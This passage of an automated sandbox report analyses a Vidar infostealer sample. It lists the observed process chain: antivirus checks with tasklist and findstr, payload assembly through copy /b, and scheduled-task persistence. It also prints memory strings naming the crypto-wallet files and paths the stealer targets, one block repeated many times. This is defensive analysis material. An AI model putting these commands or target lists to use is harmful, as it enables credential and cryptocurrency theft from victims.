                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00055BDC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00055BDC
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000786B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_000786B0
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0004A284 SetUnhandledExceptionFilter,11_2_0004A284
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0004A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0004A2B5
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0036A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0036A2B5
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0036A284 SetUnhandledExceptionFilter,38_2_0036A284

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: Hist.pif PID: 4368, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0007914C LogonUserW,11_2_0007914C
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00035240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00035240
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00081932 SendInput,keybd_event,11_2_00081932
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008504F mouse_event,11_2_0008504F
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 787041Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SenatorsRamAspectYounger" Boat Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Buffalo + Sims + Imagine 787041\lJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\787041\Hist.pif 787041\Hist.pif 787041\lJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess created: C:\ProgramData\EHIJJDGDHD.exe "C:\ProgramData\EHIJJDGDHD.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JDAFIEHIEGDH" & exitJump to behavior
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 661592Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RECEIVEFILLMEDIAEVALUATING" Natural Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Saturn + Demonstrated + Preceding + Eagles + Salon + Grows + Featured 661592\hJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\661592\Bk.pif 661592\Bk.pif 661592\hJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000786B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_000786B0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00084D89 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00084D89
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2020681262.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3070708324.00000000000D5000.00000002.00000001.01000000.00000005.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3028683361.00000000027C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Hist.pif, SolarSys.pifBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0004878B cpuid 11_2_0004878B
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008E0CA GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,11_2_0008E0CA
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00060652 GetUserNameW,11_2_00060652
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0005409A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_0005409A
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 11.2.Hist.pif.4d20000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Hist.pif.4953a50.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Hist.pif.4953a50.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Hist.pif PID: 4368, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: o*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local 